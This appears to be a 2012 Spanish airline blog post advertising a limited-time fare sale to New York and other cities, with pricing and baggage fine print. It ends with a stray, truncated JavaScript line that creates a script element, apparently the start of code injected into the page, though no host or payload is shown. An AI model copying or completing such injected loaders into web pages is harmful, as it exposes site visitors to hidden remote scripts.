¡Que levante la mano quien se apunte a un paseo por Central Park!

16/10/2012

Sin duda, nada como un paseo por Nueva York en esta época para disfrutar de uno de los mejores paisajes de la ciudad. ¿Suena bien verdad? Pues os informamos que con la nueva oleada de Los que Corren, vuelan, estáis más cerca :).

Además, podréis disfrutar de los mejores precios para volar a Caracas, México, Santo Domingo, Río de Janeiro, París, Dusseldorf, Lisboa, Burdeos, Nantes, Marsella, Bolonia, Jerez de la Frontera, Sevilla, Asturias, A Coruña, Burgos, León o Santander y por supuesto ¡Nueva York!

Aquí tenéis el link para acceder a las ofertas.

Recordad: Ofertas válidas solo para compras hasta el 19 de octubre. Los más rápidos en comprar, podrán volar a esos precios en las fechas indicadas, las plazas son limitadas.

*Precios finales comprando ida y vuelta, incluye tasas, impuestos y gastos de gestión. Salidas para vuelos de largo radio desde Madrid. Consultar otros destinos y ciudades de salida. Oferta válida hasta el 19 de octubre de 2012. Plazas sujetas a disponibilidad.

*En los vuelos operados por Iberia Express, se mantienen las condiciones de equipajes de Iberia para la primera maleta. Para exceso de equipaje se aplicarán las condiciones de la compañía que opera el vuelo.

var d=document;var s=d.createElement(‘script’);